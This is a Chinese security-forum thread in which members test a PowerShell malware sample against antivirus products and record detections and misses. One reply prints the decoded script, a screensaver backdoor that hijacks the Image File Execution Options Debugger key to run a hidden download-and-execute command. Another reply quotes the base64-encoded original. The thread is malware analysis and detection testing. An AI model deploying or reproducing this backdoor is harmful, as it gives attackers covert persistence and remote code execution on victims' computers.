查看: 979|回复: 12
收起左侧

[病毒样本] x1(6.6)

[复制链接]
秋日之殇
发表于 2022-6-6 23:57:40 | 显示全部楼层 |阅读模式
rt

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mogu6666
发表于 2022-6-6 23:59:04 | 显示全部楼层
事件: 下载被拒绝
用户: XXX
用户类型: 活动用户
应用程序名称: chrome.exe
应用程序路径: C:\Program Files\Google\Chrome\Application
组件: 安全浏览
结果说明: 已阻止
类型: 木马
名称: Trojan.PowerShell.Agent.tn
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: 1.ps1
对象路径: https://bbs.kafan.cn/forum.php?m ... 8MjIzNjY1MQ%3D%3D//
对象的 MD5: 0D226617C236E05B1990C393B1CCDE8E
原因: 数据库
数据库发布日期: 今天,2022/6/6 20:31:00

aboringman
发表于 2022-6-7 00:09:33 | 显示全部楼层
本帖最后由 aboringman 于 2022-6-7 00:10 编辑

360:miss

双击无(弹窗)反应。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kuroandsan
发表于 2022-6-7 00:17:23 | 显示全部楼层
avast miss
双击确认后无反应?(
Eset小粉絲
发表于 2022-6-7 00:28:47 | 显示全部楼层
  1. function Add-ScrnSaveBackdoor
  2. {
  3.     [CmdletBinding()] Param(
  4.         [Parameter(Position = 0, Mandatory = $False)]
  5.         [String]
  6.         $Payload,

  7.         [Parameter(Position = 1, Mandatory = $False)]
  8.         [String]
  9.         $PayloadURL,

  10.         [Parameter(Position = 2, Mandatory = $False)]
  11.         [String]
  12.         $Arguments,

  13.         [Parameter(Position = 3, Mandatory = $False)]
  14.         [String]
  15.         $NewScreenSaver = "C:\Windows\System32\Ribbons.scr"
  16.     )
  17.    
  18.     #Check if ScreenSaver is enabled
  19.     #If no enable it, if yes, get its value
  20.     if ((Get-Item "HKCU:\Control Panel\Desktop").GetValue("SCRNSAVE.EXE") -eq $null)
  21.     {
  22.         New-ItemProperty "HKCU:\Control Panel\Desktop" -Name SCRNSAVE.EXE -Value $NewScreenSaver -PropertyType String
  23.         $ScreenSaverName = ($NewScreenSaver -split '\\')[-1]
  24.     }
  25.     else
  26.     {
  27.         $ScreenSaverName = ((Get-Item "HKCU:\Control Panel\Desktop").GetValue("SCRNSAVE.EXE") -split '\\')[-1]
  28.     }

  29.     #Set ScreenSaveTimeOut which is necessary to enable screensaver.
  30.     if ((Get-Item "HKCU:\Control Panel\Desktop").GetValue("ScreenSaveTimeOut") -eq $null)
  31.     {
  32.         New-ItemProperty "HKCU:\Control Panel\Desktop" -Name ScreenSaveTimeOut -Value 60 -PropertyType String
  33.     }
  34.     else
  35.     {
  36.         Set-ItemProperty "HKCU:\Control Panel\Desktop" -Name ScreenSaveTimeOut -Value 60
  37.     }
  38.    
  39.     #Get a list of default screensavers and select one at random
  40.     $ListScrn = Get-ChildItem C:\Windows\System32\*.scr | Where-Object {$_.Name -ne $ScreenSaverName}
  41.     $PathToScreensaver = Get-Random $ListScrn

  42.     #Add a default screensaver to payload so that it runs after our payload.
  43.     if(!$Payload)
  44.     {
  45.         $RegValue = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" + ";" + $PathToScreensaver + " /s"
  46.     }
  47.     elseif ($Payload)
  48.     {
  49.         $RegValue = $Payload + ";" + $Arguments + ";" + $PathToScreensaver + " /s"
  50.     }
  51.     #Set Debugger for the ScreenSaver executable
  52.     if (Test-Path -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName")
  53.     {
  54.         
  55.         Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
  56.         Write-Output "Payload added as Debugger for $ScreenSaverName"
  57.     }
  58.     else
  59.     {
  60.         New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName"
  61.         Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
  62.         Write-Output "Payload added as Debugger for $ScreenSaverName"
  63.     }
  64. }
  65. Add-ScrnSaveBackdoor -Payload "powershell.exe calc.exe"
复制代码
Reversed - Assembly

评分

参与人数 1人气 +1 收起 理由
aboringman + 1 感谢解答: )

查看全部评分

aboringman
发表于 2022-6-7 00:48:10 | 显示全部楼层


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
huangzihang
发表于 2022-6-7 00:53:03 | 显示全部楼层
BD kill

Web Protection by
Bitdefender
Dangerous page blocked for your protection
https://bbs.kafan.cn/forum.php?m ... TV8MjIzNjY1MQ%3D%3D
Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent.
zkr090612
发表于 2022-6-7 01:08:09 | 显示全部楼层
联管miss
  1. $DoIt = @'
  2. ZnVuY3Rpb24gQWRkLVNjcm5TYXZlQmFja2Rvb3IKewogICAgW0NtZGxldEJpbmRpbmcoKV0gUGFyYW0oCiAgICAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW1N0cmluZ10KICAgICAgICAkUGF5bG9hZCwKCiAgICAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEsIE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW1N0cmluZ10KICAgICAgICAkUGF5bG9hZFVSTCwKCiAgICAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDIsIE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW1N0cmluZ10KICAgICAgICAkQXJndW1lbnRzLAoKICAgICAgICBbUGFyYW1ldGVyKFBvc2l0aW9uID0gMywgTWFuZGF0b3J5ID0gJEZhbHNlKV0KICAgICAgICBbU3RyaW5nXQogICAgICAgICROZXdTY3JlZW5TYXZlciA9ICJDOlxXaW5kb3dzXFN5c3RlbTMyXFJpYmJvbnMuc2NyIgogICAgKQogICAgCiAgICAjQ2hlY2sgaWYgU2NyZWVuU2F2ZXIgaXMgZW5hYmxlZAogICAgI0lmIG5vIGVuYWJsZSBpdCwgaWYgeWVzLCBnZXQgaXRzIHZhbHVlCiAgICBpZiAoKEdldC1JdGVtICJIS0NVOlxDb250cm9sIFBhbmVsXERlc2t0b3BcIikuR2V0VmFsdWUoIlNDUk5TQVZFLkVYRSIpIC1lcSAkbnVsbCkKICAgIHsKICAgICAgICBOZXctSXRlbVByb3BlcnR5ICJIS0NVOlxDb250cm9sIFBhbmVsXERlc2t0b3BcIiAtTmFtZSBTQ1JOU0FWRS5FWEUgLVZhbHVlICROZXdTY3JlZW5TYXZlciAtUHJvcGVydHlUeXBlIFN0cmluZwogICAgICAgICRTY3JlZW5TYXZlck5hbWUgPSAoJE5ld1NjcmVlblNhdmVyIC1zcGxpdCAnXFwnKVstMV0KICAgIH0KICAgIGVsc2UKICAgIHsKICAgICAgICAkU2NyZWVuU2F2ZXJOYW1lID0gKChHZXQtSXRlbSAiSEtDVTpcQ29udHJvbCBQYW5lbFxEZXNrdG9wXCIpLkdldFZhbHVlKCJTQ1JOU0FWRS5FWEUiKSAtc3BsaXQgJ1xcJylbLTFdCiAgICB9CgogICAgI1NldCBTY3JlZW5TYXZlVGltZU91dCB3aGljaCBpcyBuZWNlc3NhcnkgdG8gZW5hYmxlIHNjcmVlbnNhdmVyLgogICAgaWYgKChHZXQtSXRlbSAiSEtDVTpcQ29udHJvbCBQYW5lbFxEZXNrdG9wXCIpLkdldFZhbHVlKCJTY3JlZW5TYXZlVGltZU91dCIpIC1lcSAkbnVsbCkKICAgIHsKICAgICAgICBOZXctSXRlbVByb3BlcnR5ICJIS0NVOlxDb250cm9sIFBhbmVsXERlc2t0b3BcIiAtTmFtZSBTY3JlZW5TYXZlVGltZU91dCAtVmFsdWUgNjAgLVByb3BlcnR5VHlwZSBTdHJpbmcKICAgIH0gCiAgICBlbHNlCiAgICB7CiAgICAgICAgU2V0LUl0ZW1Qcm9wZXJ0eSAiSEtDVTpcQ29udHJvbCBQYW5lbFxEZXNrdG9wXCIgLU5hbWUgU2NyZWVuU2F2ZVRpbWVPdXQgLVZhbHVlIDYwCiAgICB9CiAgICAKICAgICNHZXQgYSBsaXN0IG9mIGRlZmF1bHQgc2NyZWVuc2F2ZXJzIGFuZCBzZWxlY3Qgb25lIGF0IHJhbmRvbQogICAgJExpc3RTY3JuID0gR2V0LUNoaWxkSXRlbSBDOlxXaW5kb3dzXFN5c3RlbTMyXCouc2NyIHwgV2hlcmUtT2JqZWN0IHskXy5OYW1lIC1uZSAkU2NyZWVuU2F2ZXJOYW1lfQogICAgJFBhdGhUb1NjcmVlbnNhdmVyID0gR2V0LVJhbmRvbSAkTGlzdFNjcm4KCiAgICAjQWRkIGEgZGVmYXVsdCBzY3JlZW5zYXZlciB0byBwYXlsb2FkIHNvIHRoYXQgaXQgcnVucyBhZnRlciBvdXIgcGF5bG9hZC4KICAgIGlmKCEkUGF5bG9hZCkKICAgIHsKICAgICAgICAkUmVnVmFsdWUgPSAicG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtbm9sb2dvIC1ub3Byb2ZpbGUgLWMgSUVYICgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnJFBheWxvYWRVUkwnKSk7JEFyZ3VtZW50cyIgKyAiOyIgKyAkUGF0aFRvU2NyZWVuc2F2ZXIgKyAiIC9zIgogICAgfQogICAgZWxzZWlmICgkUGF5bG9hZCkKICAgIHsKICAgICAgICAkUmVnVmFsdWUgPSAkUGF5bG9hZCArICI7IiArICRBcmd1bWVudHMgKyAiOyIgKyAkUGF0aFRvU2NyZWVuc2F2ZXIgKyAiIC9zIgogICAgfQogICAgI1NldCBEZWJ1Z2dlciBmb3IgdGhlIFNjcmVlblNhdmVyIGV4ZWN1dGFibGUKICAgIGlmIChUZXN0LVBhdGggLVBhdGggIkhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzIE5UXEN1cnJlbnRWZXJzaW9uXEltYWdlIEZpbGUgRXhlY3V0aW9uIE9wdGlvbnNcJFNjcmVlblNhdmVyTmFtZSIpCiAgICB7CiAgICAgICAgCiAgICAgICAgU2V0LUl0ZW1Qcm9wZXJ0eSAiSEtMTTpcU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1wkU2NyZWVuU2F2ZXJOYW1lIiAtTmFtZSBEZWJ1Z2dlciAtVmFsdWUgJFJlZ1ZhbHVlCiAgICAgICAgV3JpdGUtT3V0cHV0ICJQYXlsb2FkIGFkZGVkIGFzIERlYnVnZ2VyIGZvciAkU2NyZWVuU2F2ZXJOYW1lIgogICAgfQogICAgZWxzZQogICAgewogICAgICAgIE5ldy1JdGVtICJIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93cyBOVFxDdXJyZW50VmVyc2lvblxJbWFnZSBGaWxlIEV4ZWN1dGlvbiBPcHRpb25zXCRTY3JlZW5TYXZlck5hbWUiCiAgICAgICAgU2V0LUl0ZW1Qcm9wZXJ0eSAiSEtMTTpcU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1wkU2NyZWVuU2F2ZXJOYW1lIiAtTmFtZSBEZWJ1Z2dlciAtVmFsdWUgJFJlZ1ZhbHVlCiAgICAgICAgV3JpdGUtT3V0cHV0ICJQYXlsb2FkIGFkZGVkIGFzIERlYnVnZ2VyIGZvciAkU2NyZWVuU2F2ZXJOYW1lIgogICAgfQp9CkFkZC1TY3JuU2F2ZUJhY2tkb29yIC1QYXlsb2FkICJwb3dlcnNoZWxsLmV4ZSBjYWxjLmV4ZSI==
  3. '@
  4. $decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))

复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
lingdu233
发表于 2022-6-7 06:57:21 | 显示全部楼层
红伞扫描miss
心醉咖啡
发表于 2022-6-7 07:31:34 | 显示全部楼层
毒霸扫描miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-7 03:28 , Processed in 0.140751 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表